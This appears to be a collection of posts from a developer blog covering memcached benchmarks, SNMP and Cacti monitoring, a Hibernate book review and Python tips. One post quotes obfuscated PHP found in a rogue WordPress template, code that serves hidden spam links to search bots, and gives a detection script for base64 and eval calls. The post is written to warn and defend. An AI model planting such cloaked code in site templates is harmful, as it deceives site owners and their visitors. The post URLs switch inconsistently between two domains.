Netuality: Taming the big, bad, nasty websites
http://www.netuality.ro

Google: sorry, but Lisp/Ruby/Erlang not on the menu (2008-05-28)
http://www.netuality.ro/google-sorry-but-lisprubyerlang-not-on-the-menu/tools/20080529

Yes, language propaganda again. Ain't it fun?

Here is a nice quote from the latest Steve Yegge post (read it in full if you have the time; it's both fun and educational, at least for me). Here it goes:

I made the famously, horribly, career-shatteringly bad mistake of trying to use Ruby at Google, for this project. And I became, very quickly, I mean almost overnight, the Most Hated Person At Google. And, uh, and I’d have arguments with people about it, and they’d be like Nooooooo, WHAT IF… And ultimately, you know, ultimately they actually convinced me that they were right, in the sense that there actually were a few things. There were some taxes that I was imposing on the systems people, where they were gonna have to have some maintenance issues that they wouldn’t have. [...] But, you know, Google’s all about getting stuff done.

[...]

Is it allowed at Google to use Lisp and other languages?

No. No, it’s not OK. At Google you can use C++, Java, Python, JavaScript… I actually found a legal loophole and used server-side JavaScript for a project.

Mmmmm … 'kay?

Java going down, Python way up, and more … (2008-05-24)
http://www.netuality.ro/java-going-down-python-way-up-and-more/tools/20080524

According to O'Reilly Radar, sales of Java books have declined by almost 50% over the last 4 years. C# book sales grow year over year and will probably pull level with Java in 2008. JavaScript is on the rise (due to AJAX, for sure) and PHP is surprisingly in decline (although the job statistics indicate quite the contrary).

In 2007, more Ruby books were sold than Python books. In their article they classify Ruby as a "mid-major programming language" and Python as a "mid-minor programming language". However, after the announcement of Google App Engine, Python downloads from ActiveState tripled in May. This should show up in the book sales statistics pretty soon.

memcached vs tugela vs memcachedb (2008-03-16)
http://www.netuality.ro/memcached-vs-tugela-vs-memcachedb/presentations/20080317

This presentation was planned for an older Wurbe event, but since that never quite happened in the last 4 months, I am publishing it now, before it becomes totally obsolete.

My original contribution here is a comparison between the original memcached server from Danga and the tugela fork from the MediaWiki programmers. I've also tried memcachedb, but the pre-1.0 version (from Google Code) in November 2007 was quite unstable and unpredictable.

In a nutshell, these memcached variants use BerkeleyDB instead of the in-memory slab allocator. There are two direct consequences:

  • when the memory is large enough for the whole cache, the database-backed servers will be slower (my tests showed 10-15%, which might be tolerable - or not - for your app)
  • when you've got lots of data to cache and your server's memory is low, relying on BerkeleyDB is significantly better than letting the swap mechanism do its job (in my benchmarks the difference went up to 10 times, especially under very high concurrency)

Tugela will prove especially useful on virtualized servers with very little memory.

My tests were performed with the "tummy" Python client, and with Stackless for the multithreaded version. In the coming weeks I'll update the benchmarks for memcachedb 1.0.x - and I promise never, ever to wait 4 months to publish a presentation again …
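For the curious, here is a minimal sketch of the kind of set/get timing loop behind those numbers, using the tummy python-memcached client. The server address, key count and value size are illustrative placeholders, not the exact parameters of my benchmarks.

# Minimal benchmark sketch (not my exact harness): time bulk set/get against a
# memcached-protocol server with the "tummy" python-memcached client.
import time
import memcache

SERVER = '127.0.0.1:11211'   # point this at memcached, tugela or memcachedb
KEYS = 10000                 # illustrative; push it well past available RAM to see the gap
VALUE = 'x' * 1024           # 1 KB payload per key

client = memcache.Client([SERVER], debug=0)

start = time.time()
for i in xrange(KEYS):
    client.set('bench:%d' % i, VALUE)
print 'set: %.2f s' % (time.time() - start)

start = time.time()
for i in xrange(KEYS):
    client.get('bench:%d' % i)
print 'get: %.2f s' % (time.time() - start)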

Looking for #3 at Roblogfest Business/Technology? (2008-03-15)
http://www.netuality.ro/looking-for-3-at-roblogfest-businesstechnology/andeverythingelse/20080315

If you came here from the Mediafax article, this address is wrong. The Netuality you're looking for is hosted by Hotnews.

My presentation at Wurbe#5 (2008-01-22)
http://www.netuality.ro/my-presentation-at-wurbe5/presentations/20080122

Wurbe is the informal web developers' meetup group from Bucharest, Romania. Meeting #5 was focused on automated testing (unit testing, TDD, BDD and other stuff). This is my presentation:

Nasty WordPress template scam (2007-10-21)
http://www.netuality.ro/nasty-wordpress-template-scam/tools/20071021

Moving my blog to the WordPress platform, I wanted to install a template somewhat nicer than the default. This is how I discovered a potentially very harmful stunt that some blackhats are pulling with free WordPress templates. What they do is build "template farms": sites that keep a directory of hundreds or maybe thousands of templates. As these sites are very well optimized for search engines, they rank pretty high when an unsuspecting victim is looking for free templates. Sometimes the victim just downloads a nice-looking template from a seemingly innocuous blog hosted on a free platform (wordpress.com, Blogger, etc.).

Do not install a WordPress template without performing at least a cursory security audit. Let me remind you that the view layer in WordPress is just another PHP script, with full power to do anything a PHP script can do on your server. This is what the template I downloaded contained, embedded in multiple source files (sidebar, archive, etc.):

if (strstr($_SERVER['HTTP_USER_AGENT'], base64_decode('Ym90'))) { echo base64_decode(
'PGEgaHJlZj1cImh0dHA6Ly93d3cuYmVzdGZyZWVzY3JlZW5zYXZlci5jb21cIiBjbGFzcz1cInNw
YWNpbmctZml4XCI+RnJlZSBDZWxlYnJpdHkgU2NyZWVuc2F2ZXJzPC9hPjxhIGhyZWY9XCJodHRw
Oi8vd3d3LnNrb29ieS5jb21cIiBjbGFzcz1cInNwYWNpbmctZml4XCI+RnJlZSBPbmxpbmUgR2Ft
ZXM8L2E+'); }

Basically, this means that any User-Agent containing the word "bot" (thus, all the mainstream search engine bots and site crawlers) will see a couple of spammy links on every page of the blog. Obviously it could have been much worse: the same trick could expose the database credentials and other dangerous server details whenever a blackhat bot identified by a specially crafted User-Agent string scans the blog. The simplest audit you can do is to search the PHP source code for base64 and eval calls, as these are generally used to disguise malware.
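If grepping by hand gets tedious, here is a rough audit sketch of my own (not a standard WordPress tool): it walks a theme directory and flags every PHP line that mentions base64_decode or eval. The theme path is a placeholder; a hit is not proof of foul play, just a reason to read that file carefully.

# Rough audit sketch, not a standard WordPress tool: flag theme files that call
# base64_decode() or eval(), the two functions most often used to hide malware.
import os
import re

SUSPICIOUS = re.compile(r'base64_decode|eval\s*\(')
THEME_DIR = '/path/to/wp-content/themes/suspect-theme'   # placeholder, adjust to your install

for root, dirs, files in os.walk(THEME_DIR):
    for name in files:
        if not name.endswith('.php'):
            continue
        path = os.path.join(root, name)
        for lineno, line in enumerate(open(path)):
            if SUSPICIOUS.search(line):
                print '%s:%d: %s' % (path, lineno + 1, line.strip())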

New home for my blog (2007-10-20)
http://www.netuality.ro/new-home-for-my-blog/uncategorized/20071021

I decided to start blogging again, after a one-year hiatus. My new blog will be hosted here, at Netuality. Sorry for losing all the comments, but WordPress does not know how to import data from Apache Roller, so I had to do it via RSS. Oh, and yes: the weird code formatting and the oversized images will be fixed when I have some spare time …

Java Persistence with Hibernate - the book, my review (2006-12-17)
http://www.netoo.loco/java-persistence-with-hibernate-the-book-my-review/uncategorized/20061217

You have to know that I tried. Honestly, I did. I hoped to be able to read each and every page of "Java Persistence with Hibernate" (the revised edition of "Hibernate in Action"), by Christian Bauer and Gavin King. But I gave up before reading a third of it, and after that I only read selected sections. First, because I know Hibernate; I've used it in all the Java projects I've been involved with over the last 5 years or so. Second, because the content carried over from the first edition is more than familiar to me. And third, because this second edition is a massive book of more than 800 pages (double the page count of the first edition). At that rate, the fourth edition will be sold together with some sort of transportation device, because a mere human will not be able to carry that amount of paper. How did this happen?

Hibernate is the perfect example of a successful Java open-source project. Initially started as a free alternative to commercial object-relational mapping tools, it quickly became mainstream. Lots of Java developers around the world use Hibernate for the data layer of their projects. It's very comfortable: just set some attributes or ask for a business object instance, and Hibernate does all the ugly SQL for you. As a developer, you are then comfortably protected from that nasty relational database and gently swim in a sea of nicely bound objects. Right? No, not exactly. Each object-relational mapping tool has its own ways of being handled efficiently, and this is where books like "Java Persistence with Hibernate" come into play. The book teaches you how to work with Hibernate through a "real-world" example: the Caveat-Emptor online auction application.

Since the first edition of the book was written, lots of things have happened in the Hibernate world, and you can see their impact in "Java Persistence with Hibernate". Most important is the release of the 3.x line, with its various improvements and new features: annotations used as mapping descriptors, package reorganization inside the API, and above all the standardization under the umbrella of JPA (the Java Persistence API) for smooth integration with EJB 3 inside Java EE 5 servers. And this is a little bit funny. Yesterday, Hibernate was the main proof that it is possible to build industrial-quality projects in a "J2EE-less" environment; today Hibernate has put on a suit and a tie, joined the ranks of JBoss, then Red Hat, and it lures unsuspecting Java developers towards the wonderful and (sometimes) expensive world of Java EE 5 application servers. Which is not necessarily a bad move for the Hibernate API, but it is proof that in order to thrive as an open-source project, you need so much more than a SourceForge account and some passion …

Enough with that, let's take a look at the book's content. Some 75% of it is in fact the content of the first edition, updated and completed. You learn what object-relational mapping is, its advantages, its quirks, and the recommended way of developing with Hibernate. For a better understanding, single chapters from the initial book were expanded into two, sometimes more, chapters. The "unit of work" is now called "a conversation", and there is a whole new chapter (11) about conversations, which is in fact pretty good material on session and transaction management. Christian and Gavin did some great writing about concurrency and isolation in the relatively small 10th chapter - a must read even if you're not interested in Hibernate but want to understand, once and for all, the concurrent transaction behaviors everyone is talking about. The entire 13th chapter is dedicated to fetching strategies and caching - another must read if you want performance and optimization from your application. There is also a good deal of EJB, JPA and EE 5 related material scattered across multiple chapters. And finally, a solid 50-page chapter pitches the JSF (JavaServer Faces) compliant web development framework, JBoss Seam. I have only managed to read a few pages of this final chapter, so I cannot really comment. Note to self: play a little bit with that Seam thing.

To conclude: is this a fun book? No. Is this the perfect book to convert young open-source fanatics to the wonders of the Hibernate API? Nope. Is this a book to read cover to cover over a weekend? Not even close. Then what is it? First, it's the best book out there about Hibernate (and there are quite a few on the market right now), maybe even the best book about ORM in Java in general. It has lots of references to EJB, JPA and EE, and it will help you sell a Hibernate project to management - even if the final implementation uses Spring … And finally, it's the best Hibernate reference money can buy. When you have an issue, open the darn index and search; there's a 90% chance your problem will be solved. And that's a nice accomplishment. Don't get this book because it's funny, or because it's a nice read about a new, innovative open-source project. Buy it because it helps you grok ORM, write better code and deliver quality projects.

Programming is hard - the website (2006-08-02)
http://www.netoo.loco/programming-is-hard-the-website/uncategorized/20060802

A newcomer in the world of "code snippets" sites is programmingishard.com. Although the site is a few months old, it only recently started to gain some steam. Unlike its competitors Krugle and Koders, this is not a code search engine but a snippet repository, entirely tag-based and user-built. The author has a blog at tentimesbetter.com.

To whet your appetite, here is a Python code fragment that I found on the site, for the classic inline conditional which does not exist as such in Python:

n = ['no', 'yes'][thing == 1]

Obviously it has the big disadvantage of evaluating both values no matter what the condition thing is, but it is very short and elegant. Simple but nice syntactic sugar.
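For comparison, here is a small sketch of my own (not from the snippet site) putting the list-index trick next to two alternatives: the conditional expression introduced in Python 2.5, which evaluates only the branch it needs, and a lambda-based lazy variant for older interpreters.

thing = 1

# The list-index idiom from above: both candidate values are always built.
n = ['no', 'yes'][thing == 1]

# Python 2.5+ conditional expression: only the chosen branch is evaluated.
n = 'yes' if thing == 1 else 'no'

# Pre-2.5 lazy variant: wrap the candidates in lambdas and only call the winner.
n = (lambda: 'no', lambda: 'yes')[thing == 1]()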

Monitoring memcached with Cacti (2006-08-02)
http://www.netoo.loco/monitoring-memcached-with-cacti/uncategorized/20060802

Memcached is a clusterable cache server from Danga. Or, as they call it, a distributed memory object caching system. Well, whatever. Just note that memcached clients exist for lots of languages (Java, PHP, Python, Ruby, Perl) - the mainstream languages of the web world. A lighter version of the server was rewritten in Java by Mr. Jehiah Czebotar. Major websites such as Facebook, Slashdot, LiveJournal and dealnews use memcached in order to scale to the huge load they're serving. Recently, we needed to monitor the memcached servers in a high-performance web cluster. By googling and reading the related newsgroups, I was able to find two solutions:

  • from faemalia.net, a script integrated with the MySQL server templates for Cacti; it uses the Perl client.
  • from dealnews.com, a dedicated memcached template for Cacti and some scripts based on the Python client; the installation is thoroughly described.

These two solutions take the same approach: provide a Cacti template whose charts are drawn from data extracted by running memcached client scripts. Maybe very elegant, but it can become a pain in the dorsal area - futzing with Cacti templates was never my favorite pastime. Just try to import a template exported from a different version of Cacti and you'll know what I mean.

In my opinion there is a simpler way: install a memcached client on each memcached server, then extract the statistics with a script. We'll use the technique described in one of my previous posts to expose script results as SNMP OID values, then track these values in Cacti via the generic, existing mechanism. My approach has the disadvantage of requiring a memcached client on every server. However, it is very simple to build your own charts and data source templates, as for any generic SNMP data.

All you need now is a simple script that prints the memcached statistics, one per line. I will provide one-liners for Python, which will obviously only work on machines that have Python and the "tummy" client installed. This is the recipe (the default location of the Python executable on Debian is /usr/bin/python, but YMMV):

1. First, use this one-liner as an snmpd exec:

/usr/bin/python -c "import memcache; print ('%s' % [memcache.Client(['127.0.0.1:11211'], debug=0).get_stats()[0][1]]).replace(\"'\", '').replace(',', '\n').replace('[', '').replace(']', '').replace('{', '').replace('}', '')"

This will display the name of each memcached statistic along with its value, and will let you hand-pick the OIDs that you want to track. Yes, I know it could be done more simply with translate instead of multiple replace calls; that is left as an exercise for the Python-aware reader.
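If the shell escaping above looks fragile, here is a hypothetical, more readable script equivalent that snmpd could exec instead; the server address is the usual localhost placeholder.

# Readable (hypothetical) equivalent of the one-liner above: print one
# "name: value" pair per line for the local memcached instance.
import memcache

stats = memcache.Client(['127.0.0.1:11211'], debug=0).get_stats()[0][1]
for name in sorted(stats):
    print '%s: %s' % (name, stats[name])

Sorting the keys gives a stable line order, which makes mapping lines to OID indexes less error-prone.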

2. After you have the complete list of OIDs, use this one-liner:

/usr/bin/python -c "import memcache; print '##'.join(memcache.Client(['127.0.0.1:11211'], debug=0).get_stats()[0][1].values()).replace('##', '\n')"

The memcached statistics will be displayed in the same order, but this time only their values, not their names.

This is the mandatory eye candy:

Scale your applications well - until next time.

Monitoring Windows servers - with SNMP (2006-05-12)
http://www.netoo.loco/monitoring-windows-servers-with-snmp/uncategorized/20060512

My previous article focused on Linux monitoring. Often, though, you'll have at least a few Windows machines in your datacenter. SQL Server is one of the best excuses these days to get a Microsoft machine into your server room - and you know what, it's a decent database, at least for medium-sized companies like the one I'm working for right now.

It is less known, but yes, you can have SNMP support out of the box with Windows 2000 and XP, and it doesn't need to be the Server flavor [obviously it works the same in 2003 Server]:

  1. Invoke the Control Panel.
  2. Double click the Add/Remove Programs icon.
  3. Select Add/Remove Windows Components. The Windows Component Wizard is displayed.
  4. Check the Management and Monitoring Tools box.
  5. Click the Details button.
  6. Check the Simple Network Management Protocol box and click OK, then Next. You may have to reboot the machine.

Once installed, the SNMP service has to be configured. This is how:

  1. Invoke the Control Panel.
  2. Double click the Administrative Tools icon.
  3. Double click the Services icon.
  4. Select SNMP Service.
  5. Choose the Security tab.
  6. Add whatever community name is used in your network. Chances are that on an internal LAN the default public community works out of the box.
  7. For a sensitive server, you may want to fiddle a little bit with the IP restriction settings, for instance allowing SNMP communication only with the monitoring machine.
  8. Click OK then restart the service.

The next step is Cacti integration. Unfortunately, there is no Windows-specific device profile in Cacti. Therefore, if you have lots of Windows machines, you'll have to define your own - or take a Generic SNMP-enabled host and use it as a scaffold for each device configuration.

Out of the graphs and data sources already defined in Cacti [I am using 0.8.6c], only two work with Windows SNMP agents: processes and interface traffic values.

It's a good start, but if you are serious about monitoring, you need to dig a little deeper. Once again, the MIB browser comes to save the day. It's very simple: search the Windows machine for any .mib files you are able to find, copy them to your workstation, load them into the MIB browser and make some recursive walks (Get subtree on the root of the MIB). This way I was able to find some interesting OIDs for the Windows machine. For instance, .1.3.6.1.2.1.25.3.3.1.2.1 through .1.3.6.1.2.1.25.3.3.1.2.4 are the OIDs for the CPU load on each of the 4 virtual CPUs [it's a dual Xeon with HT].

Memory-related OIDs for my configuration (from the hrStorage table) are:

  • .1.3.6.1.2.1.25.2.3.1.5.6 - total physical memory (hrStorageSize)
  • .1.3.6.1.2.1.25.2.3.1.6.6 - used physical memory (hrStorageUsed)
  • .1.3.6.1.2.1.25.2.3.1.5.N - total virtual memory ["virtual" = "swap" in Windows lingo], where N is the hrStorage index of the virtual memory entry on your machine
  • .1.3.6.1.2.1.25.2.3.1.6.N - used virtual memory

Here's a neat memory chart for a Windows machine. Notice that the values are in "blocks", which in my case means 64 KB each; the total physical memory is 4 GB.
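For readers who want to check these numbers outside Cacti, here is a hedged sketch of my own (not part of the original setup) that pulls the physical memory OIDs above with the net-snmp snmpget command; the host address, community string and the trailing .6 storage index are placeholders you must adapt to your machine.

# Hedged sketch: query the hrStorage OIDs above via the net-snmp snmpget tool
# and print physical memory usage in MB. Host, community and the trailing
# storage index (.6) are placeholders - adapt them to your own server.
import subprocess

HOST = '192.168.0.10'        # illustrative Windows server address
COMMUNITY = 'public'
OIDS = {
    'units': '.1.3.6.1.2.1.25.2.3.1.4.6',   # hrStorageAllocationUnits (block size, bytes)
    'size':  '.1.3.6.1.2.1.25.2.3.1.5.6',   # hrStorageSize (total, in blocks)
    'used':  '.1.3.6.1.2.1.25.2.3.1.6.6',   # hrStorageUsed (used, in blocks)
}

def snmp_get(oid):
    # -Oqv prints only the value; take the leading integer in case a unit hint follows
    out = subprocess.Popen(
        ['snmpget', '-v', '2c', '-c', COMMUNITY, '-Oqv', HOST, oid],
        stdout=subprocess.PIPE).communicate()[0]
    return int(out.split()[0])

block = snmp_get(OIDS['units'])
total_mb = snmp_get(OIDS['size']) * block / (1024 * 1024)
used_mb = snmp_get(OIDS['used']) * block / (1024 * 1024)
print 'physical memory: %d MB used of %d MB' % (used_mb, total_mb)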

Most hardware manufacturers offer SNMP agents for their hardware, as well as the corresponding .mib files. In my case, I was able to install an agent to monitor an LSI MegaRAID controller. Here is a chart for the number of disk operations per second:

In one of my next articles, we'll take a look at how you can export "non-standard" data over SNMP from Windows, in the same manner we did on Linux, using custom scripts. Till then, have an excellent week.

Unicode in Python micro-recipe: from MySQL to webpage via Cheetah (2006-04-14)
http://www.netoo.loco/unicode-in-python-micro-recipe-from-mysql-to-webpage-via-cheetah/uncategorized/20060414

Very easy:

  • start by adding default-character-set=utf8 to your MySQL configuration file and restarting the database server
  • apply this recipe from the ActiveState Python Cookbook ("guaranteed conversion to unicode or byte string") - see the sketch after this recipe
  • inside the Cheetah template, use the ReplaceNone filter:


#filter ReplaceNone
${myUnicodeString}
#end filter

in order to prevent escaping non-ASCII characters.
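
For completeness, here is a small sketch in the spirit of that ActiveState recipe (not the exact cookbook code): a helper that coerces whatever comes out of MySQLdb into a unicode object before it reaches the Cheetah template. The connection parameters and query are illustrative only.

# Sketch in the spirit of the cookbook recipe, not the exact code: make sure
# every value handed to the template is a unicode object.
import MySQLdb

def to_unicode(obj, encoding='utf-8'):
    # decode byte strings with the given encoding, pass everything else to unicode()
    if isinstance(obj, str):
        return obj.decode(encoding)
    return unicode(obj)

# charset/use_unicode ask MySQLdb to talk UTF-8 and return unicode directly
conn = MySQLdb.connect(host='localhost', user='blog', passwd='secret',
                       db='blog', charset='utf8', use_unicode=True)
cur = conn.cursor()
cur.execute("SELECT title FROM posts LIMIT 1")
myUnicodeString = to_unicode(cur.fetchone()[0])   # safe even if it is already unicode

The variable name matches the ${myUnicodeString} placeholder used in the template above.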

Now. That’s better.
